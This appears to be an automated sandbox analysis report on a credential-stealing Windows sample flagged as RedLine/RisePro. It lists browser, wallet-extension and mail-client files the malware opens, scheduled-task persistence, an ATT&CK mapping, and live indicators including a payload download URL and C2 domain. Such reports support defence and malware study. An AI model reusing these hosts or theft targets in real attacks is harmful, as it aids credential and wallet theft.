Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D65D6C cpuid
Source: C:\Users\user\Desktop\file.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoEx,FormatMessageA,
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\file.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW,
Source: C:\Users\user\Desktop\file.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D6537F GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, type: DROPPED
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_hnfanknocfeofbddgcijnmhnfnkdnaad_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, type: DROPPED
            MITRE ATT&CK Matrix

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Create Account | 1 Valid Accounts | 2 Obfuscated Files or Information | 1 Credential API Hooking | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | 1 Valid Accounts | 1 Access Token Manipulation | 1 Software Packing | Security Account Manager | 146 System Information Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 11 Process Injection | 1 DLL Side-Loading | NTDS | 1 Query Registry | Distributed Component Object Model | 1 Email Collection | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Masquerading | LSA Secrets | 221 Security Software Discovery | SSH | 1 Credential API Hooking | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 21 Registry Run Keys / Startup Folder | 1 Valid Accounts | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph (ID: 1443534; Sample: file.exe; Start date: 17/05/2024; Architecture: WINDOWS; Score: 100)

            Top level:
            • Domains / IPs: kuljyftgjk.online; 198.187.3.20.in-addr.arpa; 2 other IPs or domains
            • Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 5 other signatures
            • Processes started: file.exe; MSIUpdaterV2.exe; oobeldr.exe; 4 other processes

            file.exe:
            • Network: 5.42.96.170, 49707, 80 (RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU, Russian Federation); 5.42.96.65, 49704, 49714, 50500 (RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU, Russian Federation); 2 other IPs or domains
            • Dropped files: C:\Users\user\...\llmcrdwzLnNKYB4T0Vnw.exe (MS-DOS); C:\Users\user\AppData\Local\...dgeMS2.exe (MS-DOS); C:\Users\user\AppData\Local\...\l2[1].exe (MS-DOS); 3 other malicious files
            • Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Tries to steal Mail credentials (via file / registry access); Uses schtasks.exe or at.exe to add and modify task schedules; 2 other signatures
            • Processes started: llmcrdwzLnNKYB4T0Vnw.exe; schtasks.exe; schtasks.exe

            MSIUpdaterV2.exe:
            • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights)
            • Processes started: schtasks.exe

            oobeldr.exe:
            • Processes started: schtasks.exe

            llmcrdwzLnNKYB4T0Vnw.exe:
            • Dropped files: C:\Users\user\AppData\Roaming\...\oobeldr.exe (MS-DOS)
            • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights)
            • Processes started: schtasks.exe

            Each schtasks.exe instance above started one conhost.exe.

            Source | Detection | Scanner | Label | Link
            file.exe | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe | 100% | Avira | HEUR/AGEN.1304053 |
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe | 100% | Avira | HEUR/AGEN.1304053 |
            C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | 100% | Avira | HEUR/AGEN.1304053 |
            C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | 100% | Avira | HEUR/AGEN.1304053 |
            C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe | 100% | Avira | HEUR/AGEN.1304053 |
            C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe | 100% | Avira | HEUR/AGEN.1304053 |
            C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | 83% | ReversingLabs | Win32.Trojan.RedLine |
            C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe | 83% | ReversingLabs | Win32.Trojan.RedLine |
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe | 83% | ReversingLabs | Win32.Trojan.RedLine |
            C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe | 83% | ReversingLabs | Win32.Trojan.RedLine |
            C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe | 83% | ReversingLabs | Win32.Trojan.RedLine |
            C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | 83% | ReversingLabs | Win32.Trojan.RedLine |

            No Antivirus matches

            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
            http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
            https://ipinfo.io/Mozilla/5.0 | 0% | URL Reputation | safe |
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe |
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
            https://ipinfo.io/ | 0% | URL Reputation | safe |
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
            https://ipinfo.io/t | 0% | URL Reputation | safe |
            https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | 0% | URL Reputation | safe |
            http://www.winimage.com/zLibDll | 0% | URL Reputation | safe |
            https://support.mozilla.org | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
            https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online:80/server/k/l2.exemespace | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online:80/server/k/l2.exe | 0% | Avira URL Cloud | safe |
            https://db-ip.com:443/demo/home.php?s=12.205.151.60 | 0% | Avira URL Cloud | safe |
            https://ipinfo.io/widget/demo/12.205.151.60 | 0% | Avira URL Cloud | safe |
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online:80/ | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
            https://db-ip.com/z- | 0% | Avira URL Cloud | safe |
            http://5.42.96.170/server/k/l2.exe | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
            https://t.me/RiseProSUPPORT | 0% | Avira URL Cloud | safe |
            https://t.me/risepro_bot | 0% | Avira URL Cloud | safe |
            http://5.42.96.170/server/k/l2.exe5 | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online/server/k/l2.exe5P#. | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online/server/k/l2.exedwzLnNKYB4T0Vnw.exe | 0% | Avira URL Cloud | safe |
            https://db-ip.com/demo/home.php?s=12.205.151.60 | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online:80/I | 0% | Avira URL Cloud | safe |
            http://5.42.96.170/server/k/l2.exeDTl | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online:80/server/k/l2.exe5G | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online/server/k/l2.exeo | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online/server/k/l2.exexefN | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online:80/Mi&/ | 0% | Avira URL Cloud | safe |
            https://ipinfo.io:443/widget/demo/12.205.151.60 | 0% | Avira URL Cloud | safe |
            https://t.me/risepro_botisepro_bot | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online/server/k/l2.exe | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online/ | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online:80/server/k/l2.exeJG | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online/Bb | 0% | Avira URL Cloud | safe |
            https://t.me/risepro_bot%( | 0% | Avira URL Cloud | safe |
            https://kuljyftgjk.online/ons | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            ipinfo.io | 34.117.186.192 | true | false | | unknown
            db-ip.com | 172.67.75.166 | true | false | | unknown
            kuljyftgjk.online | unknown | unknown | true | | unknown
            198.187.3.20.in-addr.arpa | unknown | unknown | true | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            http://5.42.96.170/server/k/l2.exe | true | Avira URL Cloud: safe | unknown
            https://ipinfo.io/widget/demo/12.205.151.60 | false | Avira URL Cloud: safe | unknown
            https://db-ip.com/demo/home.php?s=12.205.151.60 | false | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://kuljyftgjk.online:80/server/k/l2.exe | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr | false | Avira URL Cloud: safe | unknown
            https://kuljyftgjk.online:80/server/k/l2.exemespace | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr | false | Avira URL Cloud: safe | unknown
            https://sectigo.com/CPS0 | file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr | false | URL Reputation: safe | unknown
            https://db-ip.com/z- | file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr | false | Avira URL Cloud: safe | unknown
            http://ocsp.sectigo.com0 | file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr | false | URL Reputation: safe | unknown
            https://db-ip.com:443/demo/home.php?s=12.205.151.60 | file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll | file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
            https://kuljyftgjk.online:80/ | file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
